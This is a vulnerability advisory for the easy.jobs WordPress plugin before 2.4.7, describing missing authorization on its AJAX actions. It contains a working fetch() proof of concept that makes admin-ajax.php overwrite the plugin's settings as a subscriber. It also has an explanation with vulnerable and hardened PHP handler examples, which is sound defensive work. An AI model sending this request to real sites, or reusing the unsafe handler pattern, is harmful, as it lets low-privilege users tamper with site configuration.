wpexploit
Krzysztof Zając (CERT PL)
WPEX-ID: 41508340-8CAF-4DCA-BD88-350B63B78AB0
History: Dec 22, 2023 - 12:00 a.m.

easy.jobs < 2.4.7 - Subscriber+ Arbitrary Settings Update

2023-12-22 00:00:00
Krzysztof Zając (CERT PL)
Tags: easy.jobs security, version 2.4.7, subscriber+ exploit, admin-ajax.php, arbitrary settings update, multi-part form data, security vulnerability

AI Score: 6.7 Medium (Confidence: Low)
EPSS: 0.0004 Low (Percentile: 14.1%)

Description: The plugin does not properly secure some of its AJAX actions, allowing any logged-in user to modify its settings.

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "multipart/form-data; boundary=----WebKitFormBoundaryvEIqF0bdJXlPN58D",
  },
  "body": "------WebKitFormBoundaryvEIqF0bdJXlPN58D\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\neasyjobs_save_basic_info\r\n------WebKitFormBoundaryvEIqF0bdJXlPN58D\r\nContent-Disposition: form-data; name=\"form_data\"\r\n\r\n{\"company\":{\"name\":\"hehehehe\",\"username\":\"xx\",\"mobile_number\":\"999999999\",\"company_type\":{\"id\":60,\"name\":\"Accounting & Finance\"},\"website\":\"https://sdsada.adsa\",\"company_size\":1,\"description\":\"\",\"benefits\":\"\",\"show_explore_company\":true,\"show_job_filter\":false,\"show_location_filter\":[],\"jobs_per_page\":\"\",\"show_location\":false,\"show_city\":false,\"show_state\":false,\"show_country\":false},\"companyAddress\":{\"postal_code\":\"\"},\"lang\":{\"image\":\"/app-easy-jobs/img/languages/004-united-states-of-america.svg\",\"name\":\"English\",\"code\":\"en\",\"extra\":\"\"}}\r\n------WebKitFormBoundaryvEIqF0bdJXlPN58D--\r\n",
  "method": "POST"
});
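The root cause the description points at is a WordPress `wp_ajax_` handler that trusts the session alone: the `wp_ajax_{action}` hook fires for every authenticated user, so without an explicit capability check a subscriber reaches the same code path as an administrator. The following is an added illustration of that handler pattern and its hardened counterpart; it is not easy.jobs' code, and the function names, the `example_save_basic_info` action, the `nonce` field and the `example_company_settings` option are assumed names chosen for the example.

```php
<?php
// Added illustration, not the plugin's own code. Hypothetical settings-save
// handler reachable through /wp-admin/admin-ajax.php. The field names mirror
// the form_data payload shown in the PoC above.

// BEFORE (vulnerable pattern): the only gate is "is logged in", which is what
// the wp_ajax_ hook already guarantees. No nonce, no capability check, and the
// decoded JSON is stored as-is.
function example_save_basic_info_unsafe() {
    $data = json_decode( wp_unslash( $_POST['form_data'] ?? '' ), true );
    update_option( 'example_company_settings', $data );
    wp_send_json_success();
}
// add_action( 'wp_ajax_example_save_basic_info', 'example_save_basic_info_unsafe' );

// AFTER (hardened pattern): CSRF nonce, an authorization check on a capability
// that subscribers do not hold, structural validation of the payload, and
// per-field sanitization before anything is written to the options table.
function example_save_basic_info_safe() {
    // Dies with a 403 unless the request carries a nonce created for this action.
    check_ajax_referer( 'example_save_basic_info', 'nonce' );

    // Authorization: settings changes require manage_options (administrators).
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'forbidden' ), 403 );
    }

    $raw  = isset( $_POST['form_data'] ) ? wp_unslash( $_POST['form_data'] ) : '';
    $data = json_decode( $raw, true );
    if ( ! is_array( $data ) || ! isset( $data['company'] ) || ! is_array( $data['company'] ) ) {
        wp_send_json_error( array( 'message' => 'invalid payload' ), 400 );
    }

    // Allow-list the fields that are actually settings; drop everything else.
    $company = $data['company'];
    $clean   = array(
        'name'            => sanitize_text_field( $company['name'] ?? '' ),
        'website'         => esc_url_raw( $company['website'] ?? '' ),
        'company_size'    => absint( $company['company_size'] ?? 0 ),
        'show_job_filter' => ! empty( $company['show_job_filter'] ),
    );

    update_option( 'example_company_settings', $clean );
    wp_send_json_success( $clean );
}
add_action( 'wp_ajax_example_save_basic_info', 'example_save_basic_info_safe' );
```

The admin page that hosts the form has to emit the matching nonce (`wp_create_nonce( 'example_save_basic_info' )`) and send it as the `nonce` field, otherwise `check_ajax_referer` rejects legitimate requests too. The capability check is the control that closes the Subscriber+ issue; the nonce on its own does not, because a logged-in subscriber can obtain a nonce for any page they are allowed to view. When reviewing a plugin for this class of bug, look at every `add_action( 'wp_ajax_...' )` registration and confirm the handler calls `current_user_can()` with an appropriate capability before it touches `update_option()` or similar state.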

